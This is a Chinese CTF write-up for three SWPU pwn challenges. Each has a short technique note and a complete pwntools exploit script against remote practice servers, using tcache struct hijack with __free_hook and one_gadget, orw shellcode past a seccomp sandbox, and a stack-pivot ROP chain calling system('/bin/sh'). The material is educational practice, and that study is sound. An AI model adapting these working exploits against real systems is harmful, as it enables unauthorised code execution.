过去的SWPU的题目搬出来做一下
tnote:
off by one堆重叠泄露堆地址
然后劫持到tcache struct(heap_base+0x10处修改counts泄露libc然后正常打free_hook
exp:
from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])
io=remote("node2.anna.nssctf.cn",28240)
# io=process("./service")
elf=ELF("./service")
libc=ELF("./libc-2.27.so")
def add(s):
io.sendlineafter(b"choice: ",b"A")
io.sendlineafter(b"size?",str(s))
def edit(n,cc):
io.sendlineafter(b"choice: ",b"E")
io.sendlineafter(b"idx?",str(n))
io.sendlineafter(b"content:",cc)
def show(n):
io.sendlineafter(b"choice: ",b"S")
io.sendlineafter(b"idx?",str(n))
def delete(n):
io.sendlineafter(b"choice: ",b"D")
io.sendlineafter(b"idx?",str(n))
# gdb.attach(io)
# pause()
add(0x18) #0
add(0x18) #1
add(0x78) #2
add(0x10) #3
edit(0,cyclic(0x18)+p64(0x61))
delete(1)
delete(2)
# edit(0,cyclic(0x18)+p64(0x81))
add(0x50) #1 #下标复用,按照delete顺序复用
edit(1,b"a"*0x27+b"b")
show(1)
io.recvuntil(b"b")
heap_addr=u64(io.recv(6).ljust(8,b"\x00"))-0x10 #泄露堆地址
print("heap_addr: "+hex(heap_addr))
edit(1,b"a"*0x18+p64(0x81)+p64(heap_addr+0x10)+p64(0))
add(0x78) #2
add(0x78) #4
edit(4,b"\x07"*0x40+p64(0)*6+p64(heap_addr+0x10))
delete(4)
add(0x78) #4
show(4)
leak_addr=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))-0x70-libc.sym[b"__malloc_hook"] #泄露libc地址
print("leak_addr: "+hex(leak_addr))
free_hook=leak_addr+libc.sym[b"__free_hook"]
malloc_hook=leak_addr+libc.sym[b"__malloc_hook"]
one_gadget=[0x4f3d5,0x4f432,0x10a41c]
shell=leak_addr+one_gadget[1]
edit(4,b"\x02"*0x40+p64(0)*3+p64(free_hook))
add(0x40) #5
edit(5,p64(shell)) #劫持free_hook打one_gadget
delete(5) #trigger
io.interactive()
# 0x4f3d5 execve("/bin/sh", rsp+0x40, environ)
# constraints:
# rsp & 0xf == 0
# rcx == NULL
# 0x4f432 execve("/bin/sh", rsp+0x40, environ)
# constraints:
# [rsp+0x40] == NULL
# 0x10a41c execve("/bin/sh", rsp+0x70, environ)
# constraints:
# [rsp+0x70] == NULL
p1KkHeap:
开启沙盒禁用execve()
mmap开辟rwx段
劫持hook到rwx段上地址打orw shellcode即可
同样需要打tcache struct,注意构造tcachebin的大小
exp:
from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])
io=remote("node1.anna.nssctf.cn",28176)
# io=process("./SWPUCTF_2019_p1KkHeap")
elf=ELF("./SWPUCTF_2019_p1KkHeap")
libc=ELF("./libc-2.27.so")
def add(s):
io.sendlineafter(b"Choice: ",b"1")
io.sendlineafter(b"size: ",str(s))
def show(n):
io.sendlineafter(b"Choice: ",b"2")
io.sendlineafter(b"id: ",str(n))
def edit(n,cc):
io.sendlineafter(b"Choice: ",b"3")
io.sendlineafter(b"id: ",str(n))
io.sendafter(b"content: ",cc)
def delete(n):
io.sendlineafter(b"Choice: ",b"4")
io.sendlineafter(b"id: ",str(n))
# gdb.attach(io)
# pause()
mm_addr=0x66660100
add(0x100) #0
add(0x100) #1
delete(0)
delete(0)
show(0)
io.recvuntil(b"content: ")
heap_addr=u64(io.recv(6).ljust(8,b"\x00"))-0x260
print("heap_addr: "+hex(heap_addr))
add(0x100) #2
edit(2,p64(heap_addr+0x10))
add(0x100) #3
add(0x100) #4
edit(4,b"\x07"*0x40)
delete(0)
show(0)
leak_addr=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))-0x70-libc.sym[b"__malloc_hook"]
print("leak_addr: "+hex(leak_addr))
malloc_hook=leak_addr+libc.sym[b"__malloc_hook"]
orw_shellcode=asm(shellcraft.open("/flag")+shellcraft.read(3,mm_addr+0x400,0x50)+shellcraft.write(1,mm_addr+0x400,0x50))
edit(4,b"\x07"*0x40+p64(0)*6+p64(malloc_hook)+p64(0)+p64(mm_addr))
add(0x90) #5
edit(5,orw_shellcode)
add(0x70) #6
edit(6,p64(mm_addr))
add(0x30)
io.interactive()
WheretoGo:
一次溢出的栈迁移模板题,不过因为环境问题最后得迁2次
exp:
from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])
io=remote("node2.anna.nssctf.cn",28972)
# io=process("./WheretoGo")
elf=ELF("./WheretoGo")
libc=ELF("./libc-2.31.so")
puts_plt=elf.plt[b"puts"]
puts_got=elf.got[b"puts"]
bk_addr=0x4011bd
bss_addr=0x404d00
read_text=0x4011C9
leave_ret=0x4011e0
pop_rdi=0x4012d3
io.recvuntil(b"go?\n")
payload=cyclic(0x80)+p64(bss_addr)+p64(read_text)
payload=payload.ljust(0x100,b"a")
io.send(payload)
payload=p64(0)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(bk_addr)
payload=payload.ljust(0x80,b"\x00")+p64(bss_addr-0x80)+p64(leave_ret)
payload=payload.ljust(0x100,b"a")
io.send(payload)
leak_addr=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))-libc.sym[b"puts"]
print("leak_addr: "+hex(leak_addr))
sys_addr=leak_addr+libc.sym[b"system"]
str_bin_sh=leak_addr+next(libc.search(b"/bin/sh"))
payload=cyclic(0x80)+p64(bss_addr-0x200-0x8)+p64(read_text)
payload=payload.ljust(0x100,b"a")
io.send(payload)
# gdb.attach(io)
# pause()
payload=p64(0)+p64(pop_rdi)+p64(str_bin_sh)+p64(sys_addr)
payload=payload.ljust(0x80,b"\x00")+p64(bss_addr-0x280-0x8)+p64(leave_ret)
payload=payload.ljust(0x100,b"a")
io.send(payload)
# payload=cyclic(0x88)+p64(pop_rdi)+p64(str_bin_sh)+p64(sys_addr)
# io.send(payload)
io.interactive()
# Gadgets information
# ============================================================
# 0x00000000004011e0 : leave ; ret
# 0x00000000004012cc : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x00000000004012ce : pop r13 ; pop r14 ; pop r15 ; ret
# 0x00000000004012d0 : pop r14 ; pop r15 ; ret
# 0x00000000004012d2 : pop r15 ; ret
# 0x00000000004012cb : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x00000000004012cf : pop rbp ; pop r14 ; pop r15 ; ret
# 0x000000000040115d : pop rbp ; ret
# 0x00000000004012d3 : pop rdi ; ret
# 0x00000000004012d1 : pop rsi ; pop r15 ; ret
# 0x00000000004012cd : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x000000000040101a : ret
# Unique gadgets found: 12